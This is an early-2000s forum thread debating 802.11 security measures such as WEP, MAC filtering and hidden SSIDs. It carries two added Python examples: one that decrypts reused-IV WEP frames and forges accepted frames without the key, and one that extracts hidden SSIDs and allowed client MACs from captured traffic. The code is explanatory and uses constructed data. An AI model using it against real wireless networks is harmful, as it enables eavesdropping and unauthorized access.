How Secure Do You Feel?
esutherland
01-18-2002, 06:00 PM
How secure do users of 802.11 networks feel? I've gotten past my trepidation about using my credit card on a wired connection, but am not so certain of the wireless side with all the sniffers and drive-by scanning out there. One comment I hear is that corporate users, who are driving much of 802.11, are demanding the industry take security more seriously, while home consumers are still in the 'oh, cool' phase and aren't so worried...yet.
Do you feel there is enough security for 802.11 to become more than a business network, but an alternative to the wired Internet?
Ed
MoleStrangler
01-19-2002, 05:42 AM
It's easy to create a very secure wireless network with no need for RADIUS servers, Kerberos, etc.
You have to apply some methods used in the physical networking world.
Many people do not understand the technology (it's quite new technology for many businesses). Actually you have to stand back and look at the problem from a different angle.
esutherland
01-19-2002, 11:23 PM
I suppose the first step to increased wireless security is using what's already available. During last year's uproar over 802.11b, many companies didn't even go to the trouble of installing the default security. RSA released a patch to the RC4 algorithm, and people are saying that's not enough and are calling for AES, which one U.S. agency opined would take trillions of years to crack -- I'm not sure we need to go that far to protect my Amazon.com order.
First of all, it takes a couple of days to gather enough traffic to then be able to crack WEP with WEPCrack or AirSnort. Knowing this, you have to ask yourself if it's worth it for the cracker to hang around for that long to get into whatever you have.
Second, if the AP is using MAC filtering, the hacker needs to go back in the log to find a suitable MAC address and then be able to spoof it. I have yet to have someone tell me how to spoof a MAC address on a client card, although theoretically it can be done.
Changing the SSID does not provide any security at all, since it can be easily read off the air even if the stream is encrypted, because it is sent in plain text.
Since there are plenty of access points around that don't use any security at all, most hackers would opt for an easier target unless the rewards for cracking the AP greatly exceed the cost of cracking it.
So for the home user, I feel that using WEP and MAC filtering is relatively safe. So what if the cracker breaks into the system? He might get a cache of great jokes that Aunt Sally sent the owner of this house. Maybe the cracker can find a Quicken program that has credit card numbers stored in it.
However, in a business or government environment, this is entirely different. To a cracker, two days of work to get into an AP may definitely be worth the effort. In many places, all you have to do is walk in and jack into one of the many Ethernet jacks left open all over inside the building. However, access to a business may be controlled by a security guard. A wireless network may let the cracker into the building, letting the airwaves do the walking. Businesses should worry most about unsecured rogue access points because they are in a sense holes in the physical security.
A couple of other things to think about: WEP does not have a good key distribution system. This means that changing keys is a very difficult thing to do in a large-scale system. If an employee has his laptop stolen, changing the access keys of a medium-size company is virtually impossible. WEP keys are often stored in the registry in the clear. Keys can be compromised by a cracker who borrows an employee's laptop and inspects it.
Many times APs have SNMP access over the wired network. And since admins are often lazy, the passwords are sometimes left at the default or changed to something easy to remember (or guess). If SNMP access to an AP can be compromised, reading out the WEP key and adding an extra MAC address to the MAC filter is nearly trivial.
Many times a VLAN solution can be used to secure a system where WEP and MAC filtering are not enough.
It's all relative.
Konrad Roeder
http://www.springswireless.com
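The post above rests on two properties of WEP as specified in 802.11-1999: each frame is encrypted with RC4 keyed by a 24-bit per-frame IV concatenated with the shared key, and integrity is a CRC-32 (ICV) encrypted along with the data. The following is an added example, not code from the thread or from WEPCrack/AirSnort, that implements that frame format and shows why gathered traffic pays off: any IV repeat leaks the XOR of two plaintexts, and one known plaintext under an IV yields a keystream that forges frames with a valid ICV and no knowledge of the key. The key, IV and payloads are constructed for the demonstration.

```python
"""WEP frame construction and the keystream-reuse weaknesses behind WEP cracking.
Added example with a constructed 40-bit key and payloads; not from a real network."""
import struct
import zlib


def rc4_keystream(key, n):
    """Plain RC4: key-scheduling (KSA) followed by n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: little-endian CRC-32 (linear, not a MAC)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """Return IV(3) | KeyID(1) | RC4_{IV||key}(plaintext || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)      # 40- or 104-bit shared key
    body = plaintext + icv(plaintext)
    return iv + bytes([key_id << 6]) + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Decrypt with the shared key and verify the ICV; raise on mismatch."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    if tag != icv(data):
        raise ValueError("bad ICV")
    return data


def icv_ok(key, frame):
    """True if the frame decrypts with a matching ICV under this key."""
    try:
        wep_decrypt(key, frame)
        return True
    except ValueError:
        return False


def recover_keystream(frame, known_plaintext):
    """A frame with known plaintext (e.g. a guessed ARP/DHCP body) reveals the
    keystream for its IV: ciphertext XOR (plaintext || ICV). No key needed."""
    return xor(frame[4:], known_plaintext + icv(known_plaintext))


def decrypt_via_reuse(known_frame, known_plaintext, other_frame):
    """Read another frame sent under the same IV using the recovered keystream.
    Only as many bytes as the known frame provides keystream for."""
    ks = recover_keystream(known_frame, known_plaintext)
    return xor(other_frame[4:], ks)[:-4]


def forge_frame(iv, keystream, plaintext, key_id=0):
    """Build a frame the AP will accept (valid ICV) without knowing the key."""
    body = plaintext + icv(plaintext)
    assert len(body) <= len(keystream), "need a longer known-plaintext frame"
    return iv + bytes([key_id << 6]) + xor(body, keystream)


def reused_iv_leak(frame_a, frame_b):
    """Two frames sharing an IV: XOR of ciphertext bodies == XOR of plaintexts."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return xor(frame_a[4:], frame_b[4:])


# Constructed key and a single IV reused for two frames, as a 24-bit IV space
# (about 16.7 million values) guarantees on a busy network sooner or later.
KEY = b"\x01\x23\x45\x67\x89"
IV = b"\x0a\x0b\x0c"

if __name__ == "__main__":
    p1 = b"GET /index.html HTTP/1.0\r\n"   # assumed to be guessable by the attacker
    p2 = b"PASS hunter2\r\n"               # the frame the attacker wants
    f1, f2 = wep_encrypt(KEY, IV, p1), wep_encrypt(KEY, IV, p2)
    print(decrypt_via_reuse(f1, p1, f2))
    ks = recover_keystream(f1, p1)
    print(icv_ok(KEY, forge_frame(IV, ks, b"forged under IV 0a0b0c")))
```

The IV reuse shown here is the simplest failure; the FMS weak-IV attack that WEPCrack and AirSnort implement recovers the shared key itself from enough frames, which is why the post's "couple of days" of traffic matters.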
MoleStrangler
01-20-2002, 06:22 AM
(1)
Not to give the Access Points IP addresses. For a business with 10 Access Points in an office this is not a real problem. So the user needs physical access to hack the Access Point.
This also stops insider hacking. If you are hacked, then it stops the hacker attacking Access Points and possibly changing the config to suit their needs.
(2)
Use a random password generator for the WEP key and SSID. I have heard of some vendors putting the WEP key for Windows in the registry. We use Agere, which puts it in the actual card.
(3)
Deploy a decoy Access Point (or many) with no security set up (or maybe a little) to be the easy target for any hacker. These should not be connected to the physical network at all. Or, if security is paramount, then connected to a SecureBSD machine to look like a corp network and log all attacks and isolate the hack.
The hacker will see it as a challenge and hack without knowing that it is futile. It allows you to see (with syslogs and monitoring apps) that you are being targeted. Without one, how do you know your wireless network is being targeted by a hacker?
(4)
Install a VLAN-capable switch and put the wireless network on a different network and manage it that way. This is very popular with v. large installations (100+ Access Points), or installations where they are willing to spend some more money and can see and understand the advantage.
(5)
Use an Access Point that can be configured not to broadcast its network name. So even with WEP off, scanning for a network will not see any Access Points unless the exact network name and/or WEP key is installed.
If a hacker cannot see a wireless network (using the 'ANY' SSID), then how do they hack one? Used with option 3 this can be very effective. This will stop the script kiddies and the casual hacker.
For most installs I use options 1, 2 & 5 by default, and these are no-cost options.
Molestrangler,
Your list is pretty good. However I have a few comments:
(1) Not to give the Access Points IP addresses. The downside is that to change WEP keys, you need to physically connect a USB cable to each AP. This can become painful in larger deployments.
(2) Use a random password generator for the WEP key and SSID.
I agree WEP keys need to be randomly generated. However, SSIDs offer no protection whatsoever. SSIDs are sent in the clear, outside of WEP encryption.
(3) Deploy a decoy Access Point
Great idea. However, when you have multiple access points in a building, you would want them using the same SSID and encryption for roaming. It's better to run a tool like EtherPeek and trap on excessive network probing.
(4) Put the APs on their own LAN, outside the firewall. Use VPN to secure the connection. The VPN in turn is allowed to use a single port to get past the firewall to the VPN server. This is a sure bet.
The important part with this solution is to find a VPN solution that is only licensed at the server and not at the client. You don't want to have to pay for the client software every time a new employee (or student) is added to the group of users. In an academic setting there is a lot of turn-around of students each semester.
(5) Access Points without broadcasts
This is just a small deterrent. What you do is sniff the packets that an active user is using to log on to the network. The SSID is in the clear.
I would add the following to the list:
(6) use encryption - by all means use WEP if that is all you have. But a VPN solution also adds a strong encryption layer with the cost of some throughput.
(7) use MAC address filtering
Again like #5, this is a small deterrent. To get around it, sniff packets from active users. However, MAC address cloning is really much harder than simply entering an SSID into your client software.
Konrad Roeder
http://www.springswireless.com
MoleStrangler
01-21-2002, 05:05 AM
(1)
In my experience, when you configure an Access Point and document what has been done, then the Access Point does not need any further set-up/interrogation. I have never really come across many installations where there is a need for constant access to the installed Access Points.
Where security is paramount this is an option, as well as physical security.
(3)
You would not use the same SSID as the real network. You would use an obvious name like the company name for the decoy, so as to lure the hacker to them. The real network would use Access Points that do not broadcast their SSID.
This would lure the hacker into the decoy Access Point that is not connected to a physical network and has no IP address. You do not want authorised clients to roam to the decoy Access Points because they are NOT connected to any physical network.
(5)
I think that you underestimate this option. If you cannot see a wireless network to hack, then how are you to know there is a wireless network to hack? You would need inside information to know there was one to hack.
This will stop most of the casual hacks and script kiddies out there. It is very difficult to run a company and protect yourself from internal hacks.
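The disagreement above over hidden SSIDs and MAC filtering (Konrad's points 5 and 7, MoleStrangler's option 5) comes down to what an 802.11 frame header carries in the clear. The following is an added example, not code from either poster or any tool they name, that parses the 24-byte MAC header and the SSID information element from a constructed capture. It shows that an AP which sends an empty SSID in its beacons still has its name revealed by a client's directed probe request, by its own probe response, and by the association request every client must send, and that the station MAC addresses an AP exchanges data with are visible even when the WEP bit is set, which is all a MAC-filter bypass needs to observe. Frame layouts follow 802.11-1999; the addresses and SSID are made up for the sample.

```python
"""Decode 802.11 management/data headers from a constructed capture to show what
stays in the clear with WEP on: SSIDs in probe/association frames and the
station MACs each AP talks to. Sample frames are constructed, not a real capture."""
import struct

MGMT, DATA = 0, 2                                        # frame-control type values
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8    # management subtypes
# Fixed-length fields that precede the tagged IEs in each management subtype.
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, PROBE_REQ: 0, ASSOC_REQ: 4}
IE_SSID = 0
BROADCAST = b"\xff" * 6


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_ies(body):
    """Yield (element id, data) for each tagged information element."""
    i = 0
    while i + 2 <= len(body):
        ie_id, ie_len = body[i], body[i + 1]
        yield ie_id, body[i + 2:i + 2 + ie_len]
        i += 2 + ie_len


def parse_frame(frame):
    """Decode the 24-byte MAC header and, for management frames, the SSID IE."""
    fc0, fc1 = frame[0], frame[1]
    info = {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4,
            "protected": bool(fc1 & 0x40)}               # WEP bit: body only is encrypted
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if info["type"] == MGMT:
        info.update(dst=mac(a1), src=mac(a2), bssid=mac(a3), ssid=None)
        body = frame[24 + FIXED_LEN.get(info["subtype"], 0):]
        for ie_id, data in parse_ies(body):
            if ie_id == IE_SSID:
                # Zero-length or all-NUL SSID: a "hidden" beacon or a wildcard ('ANY') probe.
                info["ssid"] = "" if not data.strip(b"\x00") else data.decode("utf-8", "replace")
    elif info["type"] == DATA:
        to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
        if to_ds and not from_ds:                        # station -> AP
            info.update(bssid=mac(a1), station=mac(a2))
        elif from_ds and not to_ds:                      # AP -> station
            info.update(bssid=mac(a2), station=mac(a1))
    return info


def survey(frames):
    """Rebuild BSSID -> SSID plus the set of station MACs each AP talks to."""
    nets = {}

    def net(bssid):
        return nets.setdefault(bssid, {"ssid": None, "hidden_beacon": False, "stations": set()})

    for f in map(parse_frame, frames):
        if f["type"] == MGMT and f["subtype"] in (BEACON, PROBE_RESP):
            n = net(f["bssid"])
            if f["ssid"] == "":
                n["hidden_beacon"] = True
            elif f["ssid"]:
                n["ssid"] = f["ssid"]                    # probe responses name hidden networks
        elif f["type"] == MGMT and f["subtype"] == ASSOC_REQ:
            n = net(f["bssid"])
            if f["ssid"]:
                n["ssid"] = f["ssid"]                    # a client must name the network to join
            n["stations"].add(f["src"])
        elif f["type"] == DATA and "station" in f:
            net(f["bssid"])["stations"].add(f["station"])  # header is clear even with WEP on
    return nets


# --- constructed sample capture (made-up, locally administered addresses) ---
AP = bytes.fromhex("020000aabbcc")
STA = bytes.fromhex("020000111111")


def build_mgmt(subtype, dst, src, bssid, ssid, fixed=b""):
    hdr = struct.pack("<BBH", subtype << 4, 0, 0) + dst + src + bssid + b"\x00\x00"
    return hdr + fixed + bytes([IE_SSID, len(ssid)]) + ssid


def build_data(station, bssid, to_ds, protected=True):
    flags = (0x01 if to_ds else 0x02) | (0x40 if protected else 0)
    a1, a2 = (bssid, station) if to_ds else (station, bssid)
    hdr = struct.pack("<BBH", DATA << 2, flags, 0) + a1 + a2 + BROADCAST + b"\x00\x00"
    return hdr + bytes.fromhex("0102030011223344")      # IV + KeyID, then opaque ciphertext


SAMPLE_CAPTURE = [
    build_mgmt(BEACON, BROADCAST, AP, AP, b"", fixed=bytes(12)),          # name hidden
    build_mgmt(PROBE_REQ, BROADCAST, STA, BROADCAST, b"CorpWLAN"),        # directed probe
    build_mgmt(PROBE_RESP, STA, AP, AP, b"CorpWLAN", fixed=bytes(12)),   # AP answers by name
    build_mgmt(ASSOC_REQ, AP, STA, AP, b"CorpWLAN", fixed=bytes(4)),     # client names it again
    build_data(STA, AP, to_ds=True),                                       # WEP-protected data
]

if __name__ == "__main__":
    for bssid, n in survey(SAMPLE_CAPTURE).items():
        print(bssid, n)
```

Run against a real monitor-mode capture the same parser would need to skip radiotap/PRISM headers and handle the other management subtypes, but the point stands as the thread's later posts say: not broadcasting the SSID removes the network from a casual 'ANY' scan, while anyone who waits for one legitimate client to connect sees both the name and an allowed MAC address.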